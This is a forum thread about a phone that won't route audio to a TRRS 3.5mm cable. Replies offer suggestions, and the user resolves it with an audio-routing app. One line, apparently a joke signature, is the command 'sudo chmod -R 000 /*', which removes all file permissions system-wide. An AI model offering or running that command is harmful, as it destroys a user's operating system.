Phone not recognizing 3.5mm jack cable

Toxic Tom

Ok I am desperate now. I've tried different cables, bought new ones, fiddled with different adapters but no luck! All I want to do is plug a 3.5mm jack cable into my phone so I can play it through my CD player and in the car but IT WONT WORK. I have no idea why, it works fine when I use my headphones, but with the jack cable it just keeps playing the audio out of the phone's speakers. It's weird because my phone even worked before somewhere else, plugging it in to a set of speakers with a 3.5mm TRS jack cable. The cable I have is a TRRS cable (I can't see any problems with that, as my earbuds are also TRRS, and they work fine) but the phone just won't recognise this cable!

Please help I don't know what to do. Also, does anyone know if the headphone-socket-detection is electrical or physical? That might help me troubleshoot?

Pilates

Ok I am desperate now. I've tried different cables, bought new ones, fiddled with different adapters but no luck! All I want to do is plug a 3.5mm jack cable into my phone so I can play it through my CD player and in the car but IT WONT WORK. I have no idea why, it works fine when I use my headphones, but with the jack cable it just keeps playing the audio out of the phone's speakers. It's weird because my phone even worked before somewhere else, plugging it in to a set of speakers with a 3.5mm TRS jack cable. The cable I have is a TRRS cable (I can't see any problems with that, as my earbuds are also TRRS, and they work fine) but the phone just won't recognise this cable!

Please help I don't know what to do. Also, does anyone know if the headphone-socket-detection is electrical or physical? That might help me troubleshoot?

Your phone does not have a tv-out mode or something like that i had that issue a few years ago because my phone could also output video on the 3.5mm jack.

everyting is wired correctly to your radio? can you test the cable with another phone or laptop.

Maybe you have to select the source from your car's radio.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Your phone does not have a tv-out mode or something like that i had that issue a few years ago because my phone could also output video on the 3.5mm jack.

Don't think so

Maybe you have to select the source from your car's radio.

Yeah I did that

Pilates

Can you manually change the output settings?

my old Nokia has it  ;)

Current system - ThinkPad Yoga 460

ExSystems

Spoiler

Laptop - ASUS FX503VD

|| Case: NZXT H440 ❤️|| MB: Gigabyte GA-Z170XP-SLI || CPU: Skylake Chip || Graphics card : GTX 970 Strix || RAM: Crucial Ballistix 16GB || Storage:1TB WD+500GB WD + 120Gb HyperX savage|| Monitor: Dell U2412M+LG 24MP55HQ+Philips TV ||  PSU CX600M || 

Can you manually change the output settings?

my old Nokia has it  ;)

I can't find the option anywhere

Pilates

Are you sure the cable is properly plugged in into the phone?

ExSystems

Spoiler

Laptop - ASUS FX503VD

|| Case: NZXT H440 ❤️|| MB: Gigabyte GA-Z170XP-SLI || CPU: Skylake Chip || Graphics card : GTX 970 Strix || RAM: Crucial Ballistix 16GB || Storage:1TB WD+500GB WD + 120Gb HyperX savage|| Monitor: Dell U2412M+LG 24MP55HQ+Philips TV ||  PSU CX600M || 

Use this and use it as a widget 

ExSystems

Spoiler

Laptop - ASUS FX503VD

Use this and use it as a widget 

Right so that app is not compatible with my phone, but I found an app called SoundAbout that does the same thing, and that seems to have done the job. Thanks for the help!

Pilates